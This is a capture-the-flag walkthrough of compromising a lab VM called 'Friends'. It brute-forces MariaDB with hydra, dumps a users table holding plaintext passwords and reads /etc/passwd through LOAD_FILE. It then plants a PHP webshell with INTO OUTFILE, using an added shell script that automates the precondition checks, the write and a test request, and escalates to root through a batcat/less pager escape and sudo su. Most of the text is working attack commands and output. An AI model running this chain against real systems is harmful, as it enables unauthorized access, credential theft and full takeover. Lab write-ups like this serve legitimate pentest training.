# Lab setup

Download: Friends

Network: NAT, target IP: 192.168.1.146

# Pentest walkthrough

# Initial reconnaissance

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Friends
|_http-server-header: Apache/2.4.56 (Debian)
3306/tcp open  mysql   MySQL 5.5.5-10.5.19-MariaDB-0+deb11u2
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.5.19-MariaDB-0+deb11u2
|   Thread ID: 6
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSigpipes, InteractiveClient, SupportsCompression, ODBCClient, SupportsTransactions, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolOld, ConnectWithDatabase, DontAllowDatabaseTableColumn, FoundRows, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: |d`4"M<&Fmrvz"837Z@o
|_  Auth Plugin Name: mysql_native_password

No sensitive paths: directory brute-forcing turns up nothing, and the image on the site is clean too (no hidden data in it).

A reverse image search gives the names of the two people in the picture: beavis and butthead.

The database is exposed on 3306, so brute-force it with those names as usernames.

Got the password: rocknroll

┌──(root㉿kali)-[~]
└─# hydra -l beavis -P /usr/share/wordlists/rockyou.txt 192.168.1.146 mysql -I -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-19 02:32:27
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.1.146:3306/
[3306][mysql] host: 192.168.1.146   login: beavis   password: rocknroll
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-19 02:32:47

Log in and dump the database:

┌──(root㉿kali)-[~]
└─# mysql -h 192.168.1.146 -u beavis -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 6
Server version: 10.5.19-MariaDB-0+deb11u2 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| friends            |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.001 sec)
MariaDB [(none)]> use friends;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [friends]> show tables;
+-------------------+
| Tables_in_friends |
+-------------------+
| users             |
+-------------------+
1 row in set (0.001 sec)
MariaDB [friends]> select * from users;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
|    1 | beavis   | b3@v1$123 |
|    2 | butthead | BuTTh3@D! |
+------+----------+-----------+
2 rows in set (0.006 sec)
MariaDB [friends]>

Neither set of credentials works for SSH.

But the DB account can read files from disk (this needs the global FILE privilege; load_file() returns NULL when it is missing): select load_file('/etc/passwd');

Reading /var/www/html/index.php the same way reveals a new hint: /M3t4LL1c@

Write a webshell into that directory: select "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/M3t4LL1c@/shell.php"; (writing directly into /var/www/html/ fails with a permission error; the M3t4LL1c@ subdirectory is writable by the mysqld user.)

Use the webshell to pop a reverse shell, which gives the initial foothold on the box.
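Before firing the INTO OUTFILE above it is worth confirming the two server-side conditions it depends on: the account must hold the global FILE privilege, and secure_file_priv must not be NULL or point at a directory outside the docroot, otherwise the write is refused with no file written. The script below is an added example, not part of the original write-up: it wraps those checks, the statement itself and a curl hit on the resulting shell in shell functions. The target address, credentials and webshell path are the ones from this walkthrough; the function names, the RUN_AGAINST_TARGET switch and the grep on SHOW GRANTS are assumptions made for the example.

```shell
#!/bin/sh
# Added example for this write-up, not part of the original post.
# Checks whether SELECT ... INTO OUTFILE can land at a path, builds the
# statement, and (only when asked) runs it against the box and verifies it.
set -eu

# Values from the walkthrough; override via the environment if needed.
DB_HOST="${DB_HOST:-192.168.1.146}"
DB_USER="${DB_USER:-beavis}"
DB_PASS="${DB_PASS:-rocknroll}"

# secure_file_priv semantics in MySQL/MariaDB:
#   NULL -> LOAD_FILE() and INTO OUTFILE are disabled
#   ""   -> any path the mysqld OS user can reach
#   /dir -> only paths beneath that directory
# Returns 0 when the target path is allowed by the variable, 1 otherwise.
outfile_allowed() {
  priv="$1"
  target="$2"
  case "$priv" in
    NULL|null) return 1 ;;
    "")        return 0 ;;
    *)
      priv="${priv%/}/"            # normalise to exactly one trailing slash
      case "$target" in
        "$priv"*) return 0 ;;
      esac
      return 1 ;;
  esac
}

# SQL that drops a minimal PHP command shell at $1. The PHP's single quotes
# are doubled so they survive inside the SQL string literal.
webshell_sql() {
  printf "SELECT '<?php system(\$_GET[''cmd'']); ?>' INTO OUTFILE '%s';" "$1"
}

# Non-interactive query helper: -N drops column headers, -B gives raw output.
q() { mysql -h "$DB_HOST" -u "$DB_USER" -p"$DB_PASS" -N -B -e "$1"; }

# Read a file through the database, as the write-up does with /etc/passwd.
# Prints NULL when the FILE privilege is missing or the file is unreadable.
db_read() { q "SELECT LOAD_FILE('$1');"; }

# Preconditions, then the write, then a request to the resulting webshell.
# The file is created by the mysqld OS user, so the target directory must be
# writable by that user (the permission problem seen with /var/www/html/).
drop_webshell() {
  path="$1"
  url="$2"
  priv=$(q 'SELECT @@secure_file_priv;')
  outfile_allowed "$priv" "$path" \
    || { echo "secure_file_priv='$priv' blocks $path" >&2; return 1; }
  # FILE is a global privilege, so it only shows up in the ON *.* grant line.
  q 'SHOW GRANTS;' | grep -E '(FILE|ALL PRIVILEGES) ON \*\.\*' >/dev/null \
    || { echo "$DB_USER lacks the global FILE privilege" >&2; return 1; }
  q "$(webshell_sql "$path")"
  curl -s -G "$url" --data-urlencode 'cmd=id'
}

# Only touch the network when explicitly asked (assumed switch for this example).
if [ "${RUN_AGAINST_TARGET:-0}" = "1" ]; then
  db_read /etc/passwd
  drop_webshell '/var/www/html/M3t4LL1c@/shell.php' "http://$DB_HOST/M3t4LL1c@/shell.php"
fi
```

outfile_allowed and webshell_sql have no side effects and can be tried locally; set RUN_AGAINST_TARGET=1 to actually talk to the box. On Debian the default secure_file_priv is empty, which is why the write into the webroot works at all here; a server configured with /var/lib/mysql-files or NULL would stop this step regardless of the FILE grant.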

# Privilege escalation

sudo -l shows that batcat (bat) can be run as beavis. With paging forced on, bat hands its output to less, and the ! command in less runs a shell command as whatever user the pager is running as, so this is a straight shell escape to beavis:

sudo -u beavis batcat --paging always /etc/profile
!/bin/sh
# switch to butthead; its password is the one from the users table
beavis@friends:~$ su butthead
Password: 
butthead@friends:/home/beavis$ sudo -l
[sudo] password for butthead: 
Matching Defaults entries for butthead on friends:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User butthead may run the following commands on friends:
    (root) PASSWD: /usr/bin/su
butthead@friends:/home/beavis$ sudo su
root@friends:/home/beavis#

butthead may run su as root with his own password, which we have, so sudo su gives root directly.

# Summary

Damn, you even have to go and reverse-image-search the picture.